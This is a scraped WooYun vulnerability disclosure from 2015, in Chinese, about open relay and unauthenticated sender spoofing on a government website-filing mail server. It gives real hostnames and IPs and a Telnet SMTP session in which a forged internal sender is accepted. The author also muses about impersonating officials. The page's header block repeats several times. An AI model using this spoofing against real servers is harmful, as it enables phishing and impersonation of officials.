某备案相关邮件系统两个漏洞 | wooyun-2015-095752| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095752

漏洞标题：某备案相关邮件系统两个漏洞

漏洞作者：鬼色[N.S.T]

提交时间：2015-02-05 19:05

修复时间：2015-03-22 19:06

公开时间：2015-03-22 19:06

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-05：细节已通知厂商并且等待厂商处理中
2015-02-10：厂商已经确认，细节仅向厂商公开
2015-02-20：细节向核心白帽子及相关领域专家公开
2015-03-02：细节向普通白帽子公开
2015-03-12：细节向实习白帽子公开
2015-03-22：细节向公众公开

简要描述：

sendmail重定向传送、未登录也能发邮件，要是伪造领导的邮箱给备案的人发邮件，会不会撤销任意网站的备案信息什么的呢……

详细说明：

1、sendmail重定向传送、
sendmail 服务器接受邮件以'user@[email protected]'格式发送到收件人，利用该命令来达到在防火墙后面的邮件服务器，为了避免由通过受影响的主机路由邮件的检测。
2、未登录也能发邮件、
可使用任意@miibeian.gov.cn后缀的邮箱地址发送邮件。

漏洞证明：

工信部的邮箱服务器好像有两台，但其实就mail1.miibeian.gov.cn在用吧。
mail.miibeian.gov.cn 25 219.143.225.39
mail1.miibeian.gov.cn 25 219.143.225.38

欢迎使用 Microsoft Telnet Client
Escape 字符为 'CTRL+]'
Microsoft Telnet> set localecho
本地回显启用
Microsoft Telnet> set logfile neuron.txt
日志文件: neuron.txt
客户端登录
Microsoft Telnet> open mail1.miibeian.gov.cn 25
正在连接mail1.miibeian.gov.cn...
220 mail1.miibeian.gov.cn ESMTP Sendmail 8.13.8/8.13.8; Thu, 5 Feb 2015 09:29:01
+0800
EHLO miibeian.gov.cn
501 5.0.0 Invalid domain name
EHLO miibeian.gov.cn
250-mail1.miibeian.gov.cn Hello [119.129.209.201], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH GSSAPI DIGEST-MD5 CRAM-MD5 LOGIN PLAIN
250-DELIVERBY
250 HELP
MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender ok
RCPT TO:[email protected] NOTIFY=success,failure
250 2.1.5 [email protected]... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
hello
this is one test mail, if you receive this email, prove your mail server unsafe.
.test by neuron
.
250 2.0.0 t151T1I7009914 Message accepted for delivery
quit
221 2.0.0 mail1.miibeian.gov.cn closing connection

修复方案：

本来想告诉你们的，但是http://www.miitbeian.gov.cn/getVerifyCode?82 你们这破验证码，怎么输都是错，错错…… NEURON最牜庇。

版权声明：转载请注明来源鬼色[N.S.T]@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-02-10 11:52

厂商回复：

CNVD确认所述情况，转由CNCERT向工信部通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095752

漏洞标题：某备案相关邮件系统两个漏洞

相关厂商：某备案相关系统

漏洞作者：鬼色[N.S.T]

提交时间：2015-02-05 19:05

修复时间：2015-03-22 19:06

公开时间：2015-03-22 19:06

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源鬼色[N.S.T]@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095752

漏洞标题：某备案相关邮件系统两个漏洞

相关厂商：某备案相关系统

漏洞作者： 鬼色[N.S.T]

提交时间：2015-02-05 19:05

修复时间：2015-03-22 19:06

公开时间：2015-03-22 19:06

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-095752"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 鬼色[N.S.T]@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：鬼色[N.S.T]

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源鬼色[N.S.T]@乌云